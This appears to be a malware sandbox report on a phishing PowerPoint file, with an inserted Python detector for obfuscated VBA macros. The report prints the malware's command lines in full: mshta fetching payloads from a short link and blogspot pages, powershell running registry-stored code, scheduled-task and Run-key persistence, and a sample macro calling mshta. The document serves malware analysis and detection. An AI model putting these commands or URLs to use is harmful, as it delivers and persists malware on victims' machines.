Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_001E5408 29_2_001E5408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_001E5750 29_2_001E5750
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_02A018A8 33_2_02A018A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_02A074B7 33_2_02A074B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_02A01897 33_2_02A01897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_02A074C8 33_2_02A074C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_02A0618D 33_2_02A0618D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_02A01538 33_2_02A01538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_02A01548 33_2_02A01548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_02AE1BE2 33_2_02AE1BE2
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: BankSwiftCopyUSD95000.ppt OLE, VBA macro line: Sub Auto_Close()
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function Auto_Close Name: Auto_Close
Document contains embedded VBA macros
Source: BankSwiftCopyUSD95000.ppt OLE indicator, VBA macros: true
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: BankSwiftCopyUSD95000.ppt OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 29.2.MSBuild.exe.400000.2.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 29.2.MSBuild.exe.400000.2.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winPPT@46/51@29/5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_003FACEE AdjustTokenPrivileges, 12_2_003FACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_003FACB7 AdjustTokenPrivileges, 12_2_003FACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_01D9ACEE AdjustTokenPrivileges, 24_2_01D9ACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_01D9ACB7 AdjustTokenPrivileges, 24_2_01D9ACB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CEACEE AdjustTokenPrivileges, 33_2_01CEACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CEACB7 AdjustTokenPrivileges, 33_2_01CEACB7
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BankSwiftCopyUSD95000.LNK
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC735.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................................................x.x...............x...............x.......x.....
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................................................x.x.............................X.'.......x.....
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................................................x.x...............x.......................x.....
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................6.......................x.x.............................X.'.......x.....
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................?.......................x.x...............x.......................x.....
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#...............(.P.............................S.......................x.x.....#.......................X.'.......x.....
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#...............(.P.............................\.......................x.x.....#.........x.......................x.....
Source: C:\Windows\System32\schtasks.exe Console Write: .................................................v-.............................................................................................
Source: C:\Windows\System32\taskkill.exe Console Write: ................................................d1......................L...............d...............................X.......B.........3.....
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................l.......T.......................................................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................h.......v.......................................................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: 12 writes of non-printable data (rendered as '.' by the sandbox; no recoverable text)
Source: C:\Windows\System32\taskkill.exe Console Write: 1 write of non-printable data (rendered as '.' by the sandbox)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: 7 writes of non-printable data (rendered as '.' by the sandbox)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll (the same three files are loaded by each of the three 32-bit powershell.exe instances; listed once)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\System32\PING.EXE WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "winword.exe")
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EXCEL.exe")
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts (16 reads across the mshta.exe instances)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts (3 reads)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: BankSwiftCopyUSD95000.ppt Virustotal: Detection: 34%
Source: BankSwiftCopyUSD95000.ppt ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
Source: unknown Process created: C:\Windows\System32\PING.EXE ping.exe
Source: unknown Process created: C:\Windows\System32\mshta.exe mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv
Source: unknown Process created: C:\Windows\System32\PING.EXE ping.exe
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: unknown Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {2ABF5983-E6CF-46DC-B95A-53E1F6F4D156} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
Source: unknown Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).meather)|IEX'', 0 : window.close')
Source: unknown Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: unknown Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://backbones1234511a.blogspot.com/p/stback1.html'', 0 : window.close')
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://startthepartyup.blogspot.com/p/backbone14.html'', 0 : window.close')
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html'', 0 : window.close')
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\PING.EXE ping.exe
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\mshta.exe mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\PING.EXE ping.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: Managament.inf.pdb source: powershell.exe, 0000000C.00000002.2287134514.0000000006951000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.2254678756.0000000002B60000.00000002.00000001.sdmp
Source: BankSwiftCopyUSD95000.ppt Initial sample: OLE document summary bytes = 0
Source: BankSwiftCopyUSD95000.ppt Initial sample: OLE document summary hiddenslides = 0
Source: BankSwiftCopyUSD95000.ppt Initial sample: OLE document summary mmclips = 0
Source: BankSwiftCopyUSD95000.ppt Initial sample: OLE document summary notes = 0
Source: BankSwiftCopyUSD95000.ppt Initial sample: OLE document summary presentationtarget = Widescreen
Source: BankSwiftCopyUSD95000.ppt Initial sample: OLE document summary slides = 0

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: BankSwiftCopyUSD95000.ppt Stream path 'VBA/Module1' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Module1 Name: Module1
Document contains an embedded VBA with many randomly named variables
Source: BankSwiftCopyUSD95000.ppt Stream path 'VBA/Module1' : High entropy of concatenated variable names
Yara detected Costura Assembly Loader
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_0040921A pushad ; ret 12_2_0040921D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_004091D2 push eax; ret 12_2_004091D5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_05640450 push eax; mov dword ptr [esp], ecx 12_2_05640474
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_01E591D2 push eax; ret 24_2_01E591D5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_01E5921A pushad ; ret 24_2_01E5921D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_0571017C push 000000C3h; ret 24_2_057101A5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_0571045C push eax; mov dword ptr [esp], ecx 24_2_05710474
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_05791A57 push 6E7FC374h; ret 24_2_05791A6E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_05791B93 push 6E7FC3C4h; ret 24_2_05791BAA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CEA1A8 push DCBDC399h; ret 33_2_01CEA219
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF61FF push ebx; iretd 33_2_01CF6202
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF61FD push ecx; iretd 33_2_01CF61FE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF61F9 push eax; iretd 33_2_01CF61FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5DA4 push eax; retn 0074h 33_2_01CF5F59
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5557 push ebp; iretd 33_2_01CF555A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5554 push ebp; iretd 33_2_01CF5556
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5578 push eax; retn 0074h 33_2_01CF5579
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF6908 push eax; retn 0074h 33_2_01CF6BE5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF2C9C push eax; retn 0074h 33_2_01CF2C9D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5098 push eax; retn 0074h 33_2_01CF5099
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF58B0 push eax; retn 0074h 33_2_01CF5D81
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF6868 push edi; iretd 33_2_01CF689E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5077 push eax; iretd 33_2_01CF507A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5075 push eax; iretd 33_2_01CF5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF43E8 push edi; iretd 33_2_01CF43D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF43E8 push edi; iretd 33_2_01CF4466
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF43E0 push edi; iretd 33_2_01CF43E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF4388 push edi; iretd 33_2_01CF43DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF4F91 push eax; iretd 33_2_01CF4F92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF4FB0 push eax; retn 0074h 33_2_01CF4FB1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 33_2_01CF5354 push eax; retn 0074h 33_2_01CF5355
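The VBA signatures above (many GOTO operations, high entropy of the concatenated variable names, base64-encoded strings in the macro) are static heuristics, and it is worth seeing what they actually measure. The Python below is an added example written for this page, not the sandbox's code and not the sample's macro: the report does not reproduce the VBA stream, so both modules are constructed for illustration, and the thresholds (one fifth of the lines being a GoTo, 4.0 bits per character of identifier entropy) are my own choice rather than the sandbox's.

```python
"""Macro-obfuscation heuristics of the kind the report's VBA signatures describe."""
import base64
import math
import re
from collections import Counter

# Constructed VBA modules (the report does not reproduce the sample's macro): one written the
# way the signatures describe, one ordinary. The Msxml2 DOMDocument trick is how VBA macros
# usually decode Base64 without a helper library.
OBFUSCATED_VBA = r'''
Sub Auto_Open()
Dim qzjxkwpl As String, mvtrbhnc As Object, yfdgslao As Object
GoTo lbl_a
lbl_c:
Set mvtrbhnc = CreateObject("Msxml2.DOMDocument").createElement("b64")
mvtrbhnc.DataType = "bin.base64"
mvtrbhnc.Text = qzjxkwpl
GoTo lbl_d
lbl_a:
qzjxkwpl = "V1NjcmlwdC5TaGVsbA=="
GoTo lbl_b
lbl_b:
GoTo lbl_c
lbl_d:
Set yfdgslao = CreateObject(StrConv(mvtrbhnc.nodeTypedValue, vbUnicode))
yfdgslao.Run "mshta http://j.mp/dbgghasdnasdjasgdakgsdhv", 0
End Sub
'''

CLEAN_VBA = r'''
Sub FormatReport()
Dim totalRows As Integer, sheetName As String
sheetName = "Summary"
For totalRows = 1 To 10
Cells(totalRows, 1).Value = totalRows
Next totalRows
End Sub
'''


def shannon_entropy(text):
    """Bits per character; random-looking identifiers score close to log2(alphabet size)."""
    n = len(text)
    if not n:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def declared_names(vba):
    """Identifiers declared with 'name As Type' (Dim lines and parameters)."""
    return re.findall(r"\b(\w+)\s+As\s+\w+", vba)


def base64_literals(vba, min_len=16):
    """String literals that are well-formed Base64 and decode to printable ASCII."""
    found = []
    for lit in re.findall(r'"([^"]*)"', vba):
        if len(lit) < min_len or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", lit):
            continue
        try:
            decoded = base64.b64decode(lit, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            found.append((lit, decoded))
    return found


def analyze(vba, goto_ratio=0.2, entropy_bits=4.0):
    """Score one module; returns the raw metrics plus the signature-style flags that fired."""
    lines = [ln for ln in vba.splitlines() if ln.strip()]
    gotos = len(re.findall(r"\bGoTo\b", vba, re.I))
    entropy = shannon_entropy("".join(declared_names(vba)))
    b64 = base64_literals(vba)
    flags = []
    if lines and gotos / len(lines) >= goto_ratio:
        flags.append("many GOTO operations")
    if entropy >= entropy_bits:
        flags.append("high-entropy variable names")
    if b64:
        flags.append("base64 strings")
    return {"goto_count": gotos, "name_entropy": round(entropy, 2), "base64": b64, "flags": flags}
```

The GoTo count is normalised by line count because a long legitimate module can contain a handful of GoTo statements (error handlers) without being suspicious; the entropy check concatenates all declared names so that a single long random identifier does not dominate. Run `analyze(OBFUSCATED_VBA)` to see all three flags fire and `analyze(CLEAN_VBA)` to see none.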

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).meather)|IEX"", 0 : window.close")
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://backbones1234511a.blogspot.com/p/stback1.html"", 0 : window.close")
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://startthepartyup.blogspot.com/p/backbone14.html"", 0 : window.close")
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html"", 0 : window.close")
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).phuttalylo)|IEX"", 0 : window.close")
Creates multiple autostart registry keys
